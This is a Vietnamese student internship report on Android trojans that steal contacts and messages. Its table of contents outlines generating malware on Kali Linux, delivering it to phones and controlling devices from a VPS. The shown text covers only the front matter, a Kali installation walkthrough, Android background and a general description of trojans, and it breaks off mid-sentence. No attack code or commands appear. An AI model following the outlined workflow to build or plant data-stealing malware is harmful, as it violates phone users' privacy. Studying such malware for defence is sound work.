SlideShare une entreprise Scribd logo
1  sur  62
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH
TRƯỜNG ĐẠI HỌC BÁCH KHOA
KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH
TRUNG TÂM ĐÀO TẠO
QUẢN TRỊ MẠNG & AN NINH
MẠNG QUỐC TẾ ATHENA
BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT
Nghiên cứu các Trojan, Malware cho phép đánh
cắp dữ liệu như danh sách contact, tin nhắn trên
điên thoại sử dụng Android và gửi ra ngoài
GVHD: Thầy VÕ ĐỖ THẮNG
SVTH: Lê Công Hậu
MSSV: 51101058
TPHCM, ngày 28 tháng 07 năm 2014
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 1
LỜI CAM ĐOAN
Tôi xin cam đoan:
 Những nội dung trong báo cáo này là do tôi thực hiện dưới sự
hướng dẫn trực tiếp của thầy Võ Đỗ Thắng.
 Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ
ràng tên tác giả, tên công trình, thời gian, địa điểm công bố.
 Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận,
tôi xin chịu hoàn toàn trách nhiệm.
TPHCM, ngày 28 tháng 07 năm 2014
Sinh viên thực tập
Lê Công Hậu
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 2
LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK
TPHCM
Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa TPHCM và khoa
Khoa Học và Kỹ Thuật Máy Tính đã tạo điều kiện cho tôi hoàn thành tốt đợt
TTCN 2 này. Trong đợt thực tập này đã cho tôi những kinh nghiệm quý báu.
Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc và môi
trường làm việc sau này.
Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp này với tất
cả nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có
hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Tôi rất
mong nhận được sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa.
Một lần nữa tôi xin chân thành cảm ơn.
TPHCM, ngày 28 tháng 07 năm 2014
Sinh viên thực tập
Lê Công Hậu
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 3
LỜI CẢM ƠN TRUNG TÂM ATHENA
Tôi xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế
Athena, cùng các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy
Đỗ Võ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian thực
tập tại công ty. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp nhũng kiến thức
cần thiết cũng như đóng góp những ý kiến quý báu để hoàn thành tốt bài báo
cáo này.
Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp này với tất
cả nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có
hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Tôi rất
mong nhận được sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa.
Một lần nữa tôi xin chân thành cảm ơn.
TPHCM, ngày 28 tháng 07 năm 2014
Sinh viên thực tập
Lê Công Hậu
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 4
LỜI MỞ ĐẦU
Trong những năm gần đây, vấn đề “An toàn và bảo mật thông tin” đang
ngày càng nóng. Với sự phát triển đến chóng mặt của các nền tảng di động như
iOS, Android, Windows Phone cùng với nhiều dòng điện thoại thông minh, vấn
đề bảo mật thông tin chuyển dần xu hướng từ PC sang mobile. Nếu bạn đang sở
hữu một chiếc smartphone của Apple, Google Nexus, Samsung, Nokia, HTC, ...
liệu bạn có dám chắc là “dế cưng” của mình không bị nhiễm các phần mềm gián
điệp, nghe lén không? Vì sao lại như vậy? Vì theo báo cáo gần đây của các hãng
phần mềm bảo mật như Kaspersky Lab, Norton AV, Avast hay BKAV số lượng
smartphone bị nhiễm mã độc ngày càng tăng. Đặc biệt HĐH Android là một
HĐH phát triển khá nhanh trong những năm gần đây lại là một mảnh đất béo
bở cho các Hacker tấn công. Với sự nhẹ dạ cả tin, thiếu hiểu biết của người
dùng, lòng tham các các thứ “Free” như free app, free wifi đã vô tình tiếp tay
cho các Hacker xâm nhập và cài đặt mã độc trên chính chiếc điện thoại của bạn.
Hôm nay mình viết bài báo cáo về đề tài “Nghiên cứu các trojan, malware
cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại
Android và gửi ra ngoài” để cùng nghiên cứu, tìm hiểu cách thức hoạt động,
chia sẻ thông tin cũng như cung cấp các giải pháp để phòng tránh.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 5
NHẬN XÉT CỦA KHOA
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Trưởng Khoa
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 6
NHẬN XÉT CỦA CÔNG TY THỰC TẬP
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giám đốc
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 7
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giáo viên hướng dẫn
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 8
MỤC LỤC
LỜI CAM ĐOAN..................................................................................................................................1
LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK TPHCM ..............................................2
LỜI CẢM ƠN TRUNG TÂM ATHENA........................................................................................3
LỜI MỞ ĐẦU .......................................................................................................................................4
NHẬN XÉT CỦA KHOA....................................................................................................................5
NHẬN XÉT CỦA CÔNG TY THỰC TẬP .....................................................................................6
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN.............................................................................7
MỤC LỤC...............................................................................................................................................8
1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP ................................................9
2 NỘI DUNG THỰC TẬP.............................................................................................11
2.1 Làm trên localhost:..........................................................................................................11
2.1.1 Giới thiệu HĐH Kali Linux:...............................................................................11
2.1.2 Cài đặt Kali Linux trên VMware:....................................................................13
2.1.3 Giới thiệu HĐH Android:...................................................................................29
2.1.4 Giới thiệu về Trojan: ...........................................................................................32
2.1.5 Giới thiệu về Malware:.......................................................................................34
2.1.6 Sinh mã độc trên Kali Linux: ...........................................................................36
2.1.7 Đưa mã độc vào thiết bị Android:.................................................................41
2.1.8 Xâm nhập SD card của thiết bị Android từ Kali Linux:........................45
2.1.9 Kết luận:....................................................................................................................47
2.2 Làm trên VPS......................................................................................................................47
2.2.1 Giới thiệu về VPS:.................................................................................................47
2.2.2 Cài đặt mã độc trên VPS: ...................................................................................49
2.2.3 Từ VPS xâm nhập vào thiết bị Android:.....................................................56
3 KẾT QUẢ ĐẠT ĐƯỢC...............................................................................................60
4 KẾT LUẬN QUÁ TRÌNH THỰC TẬP ..................................................................61
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 9
1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP
Cơ sở 1_Tại TP Hồ Chí Minh:
- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế
ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí
Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
Cơ sở 2_Tại TP Hồ Chí Minh:
- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế
ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ
Chí Minh, Việt Nam.
Website: www.athena.edu.vn or www.athena.com.vn
Điện thoại: (84-8) 2210 3801
Hotline: 0943 20 00 88
- Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA
được thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ
Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực
CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa
công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển
nước nhà.
- Lĩnh vực hoạt động:
 Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu
chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle,
Linux LPI, CEH... Song song đó, trung tâm ATHENA còn có những
chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các
đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, các
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 10
cơ quan chính phủ, tổ chức tài chính…
 Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm
ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống
mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông
Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh,
bưu điện các tỉnh,…
 Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương
trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học
Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ
Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin
(VNISA), Viện Kỹ Thuật Quân Sự…
- Đội ngũ giảng viên:
 Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các
trường đại học hàng đầu trong nước.... Tất cả giảng viên ATHENA đều
phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+,
CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các
chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại
trung tâm ATHENA.
 Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật
kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan,
Singapore,... và truyền đạt các công nghệ mới này trong các chương
trình đào tạo tại trung tâm ATHENA.
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 11
2 NỘI DUNG THỰC TẬP
2.1 Làm trên localhost:
2.1.1 Giới thiệu HĐH Kali Linux:
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết
kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân
của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh
giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm
2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên
là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và
phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá
bảo mật nào cũng cần sử dụng khi tác nghiệp.
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali.
So với BackTrack, Kali có rất nhiều cải tiến:
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository
(Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên
có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 12
nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration
Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản
lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng
về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng
hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.
Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích
với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo
ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung
Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều
nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị
mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia
bảo mật thực hiện đánh giá mạng không dây.
Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ
thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều
loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử
dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì
hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công
bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3
năm ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành
Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới
xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 13
2.1.2 Cài đặt Kali Linux trên VMware:
Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên
link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.8 64 bit.
http://www.kali.org/downloads/
Hình 2.1.1 Download HĐH Kali Linux
Nếu học Công nghệ thông tin thì chắc chắn bạn sẽ biết đến phần
mềm có tên là VMware. VMware Workstation là một phần mềm tạo máy
ảo hàng đầu. Bạn có thể dùng VMware để tạo 1 máy tính ảo chạy
Windows, Linux, Mac OS hay thậm chí là Android nữa. VMware
Workstation 10 là một phần mềm giả lập hệ điều hành để bàn rất nổi
tiếng của hãng VMware Inc. Với hơn 50 tính năng mới, có thể thay đổi
đáng kể cách thức làm việc với các máy ảo.
Từ giao diện chính của VMware thì nhấn vào File -> New Vitual
Machine (hoặc dùng phím tắt Ctrl + N).
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 14
Chọn Typical và nhấn Next. Đây là những cài đặt mà VMware
khuyên dùng nếu muốn tự thiết lập những tùy chọn thì nhấn vào
Custom. Nếu không rành thì tốt nhất cứ chọn Typical đỡ phiền sau này.
Ở đây mình chọn Custom và nhấn next.
Hình 2.1.2 New Virtual Machine Wizard (Step 1)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 15
Tick vào Installer Disc image file. Và chọn đến file ISO cần cài đặt
VMware sẽ tự nhận diện đó là file iso của hệ điều hành nào.
Hình 2.1.3 New Virtual Machine Wizard (Step 2)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 16
Sau đó sẽ chọn tên máy ảo và nơi lưu trữ dữ liệu của nó
Hình 2.1.4 New Virtual Machine Wizard (Step 3)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 17
Ở những bước sau thì cứ nhấn Next. Đến đây thì có một tùy chọn là
“Customize Hardware...” Cái này để thay đổi các thông số như dung
lượng RAM, Ổ cứng, USB Controler… Cũng tùy vào hệ điều hành đang cài
mà chọn dung lượng cho phù hợp. VMware cũng đã chọn cho mình 1
dung lượng phù hợp rồi.
Hình 2.1.5 New Virtual Machine Wizard (Step 4)
Sau khi hoàn thành các bước này thì máy ảo sẽ tự động bật và sẽ tiến
hành cài đặt một cách tự động. Tùy vào dung lượng mà quá trình sẽ diễn
ra nhanh hay chậm thông thường thì mất vài chục phút cho đến vài
tiếng. Tuy nhiên với những file ISO không hỗ trợ nhận diện tự động thì
bạn vẫn sẽ phải cài bằng tay từng bước như cài win bình thường (điều
này cũng không khó khăn lắm đúng không?)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 18
Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai
chế độ cài đặt là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ
chọn Graphical Install
Hình 2.1.6 Graphical Install
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 19
Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue
Hình 2.1.7 Select a language
Hình 2.1.8 Select your location
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 20
Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn
đang sử dụng
Hình 2.1.9 Configure the keyboard
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 21
Bạn sẽ cần phải cấu hình Network và Password cho tài khoản Root
Hình 2.1.10 Configure the network
Hình 2.1.11 Set up user and password
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 22
Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali.
Hình 2.1.12 Partition disks (Step 1)
Hình 2.1.13 Partition disks (Step 2)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 23
Hình 2.1.14 Partition disks (Step 3)
Hình 2.1.15 Partition disks (Step 4)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 24
Hình 2.1.16 Partition disks (Step 5)
Hình 2.1.17 Partition disks (Step 6)
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 25
Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt
bắt đầu.
Hình 2.1.18 Install the system
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 26
Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân
phối các ứng dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi
cần thiết. Chú ý: Nếu bạn chọn “No” trong màn hình này, bạn sẽ không
thể cài đặt các gói từ kho lưu trữ của Kali.
Hình 2.1.19 Configure the package manager
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 27
Tiếp đến là cài đặt GRUB
Hình 2.1.20 Install the GRUB boot loader on the hard disk
Cuối cùng, nhấp vào Continue để khởi động lại Kali.
Hình 2.1.21 Finish the installation
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 28
Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali.
Hình 2.1.22 Kali Linux login
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 29
Giao diện sau khi cài đặt xong:
Hình 2.1.23 Kali Linux OS
2.1.3 Giới thiệu HĐH Android:
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 30
Lịch sử
Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California
vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich
Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó
giám đốc T-Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để
phát triển, theo lời của Rubin, "các thiết bị di động thông minh hơn có thể biết
được vị trí và sở thích của người dùng". Dù những người thành lập và nhân viên
đều là những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm
thầm, chỉ tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong
năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn thân của Rubin, mang
cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty.
Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó
thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng
công ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau
thương vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng
nhiều người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di động
sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng
thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này cho
các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống
uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần
cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp
tác với các cấp độ khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di
động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall
chú thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào
điện thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương
tiện truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang
phát triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói
rằng trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã
trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng.
Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve
cho biết Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại
di động.
Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance),
một hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn
Broadcom, Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia,
Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với
mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android
cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng
thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện thoại
chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10
năm 2008. Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 31
lá cây do hãng thiết kế Irina Blok tại California vẽ.
Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ
điều hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành
trước. Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên
của một món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ
có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất (chính
thức) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt loạt thiết bị
Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy
hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với
Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó
nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4
và máy tính bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem điện
thoại và máy tính bảng Nexus là những thiết bị Android chủ lực của mình, với
những tính năng phần cứng và phần mềm mới nhất của Android.
Đặc điểm
1. Tính mở. Android được xây dựng từ dưới đi lên cho phép người phát triển
tạo các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết
bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất
kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử
dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn
các tính năng cho người dùng. Android được xây dựng trên nhân Linux
mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và
phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có
thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng
này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng
di động hoàn hảo.
2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau
giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng
được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ
của điện thoại. Với các thiết bị được xây dựng trên nền tảng Android,
người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có
thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng
ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích.
3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng
dụng mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ
trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ,
lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người khác. Với
Android, người phát triển có thể xây dựng một ứng dụng mà cho phép
người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị
trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của
MapView và dịch vụ định vị toàn cầu GPS.
4. Xây dựng ứng dụng dễ dàng và nhanh chóng. Android cung cấp bộ thư
viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công Hậu 51101058
Trang 32
dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được
vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo
nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn
bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
2.1.4 Giới thiệu về Trojan:
Trojan - một chương trình dạng virus, một kẻ làm nội gián trong máy tính
của bạn đã giúp cho hacker điều khiển máy tính của bạn, Trojan giúp hacker
lấy những thông tin quý báu của bạn, thậm chí hắn có thể xóa hoặc định dạng
lại cả ổ cứng của bạn nữa. Trojan có thể nhiễm vào máy của bạn qua tập tin gắn
kèm thư điện tử mà bạn đã vô tình tải về và chạy thử, hoặc có lẫn trong những
chương trình trò chơi, nhưng chương trình mà bạn không rõ nguồn gốc... Ðể
"moi ruột" được mật khẩu của các chủ thuê bao, hacker nội thường sử dụng
virus có họ Trojan gửi đến các thuê bao cần tấn công thông qua thư điện tử (e-
mail) dưới dạng dữ liệu đính kèm (File Attachment). Chỉ cần khi các chủ thuê
bao vô tình mở file này, lập tức Trojan được kích động và tự động sao chép lại
tất cả các thông số về mật khẩu của chủ thuê bao. Không chỉ là mật khẩu truy
cập Intemet mà ngay cả đến mật khẩu của hòm thư điện tử cũng dễ dàng bị
đánh cắp. Ngay sau khi chủ thuê bao kết nối Internet, Trojan sẽ bí mật sinh ra
một e- mail và gửi mật khẩu đánh cắp về cho "tin tặc". Và sau đó mỗi lần thay
đổi mật khẩu virus Trojan sẽ tiếp tục lặng lẽ "tuồn" của ăn cắp tới một địa chỉ
mà hacker nội đã định sẵn.
Ðể đánh lừa "nạn nhân", "tin tặc" luôn tìm cách giăng ra những loại bẫy
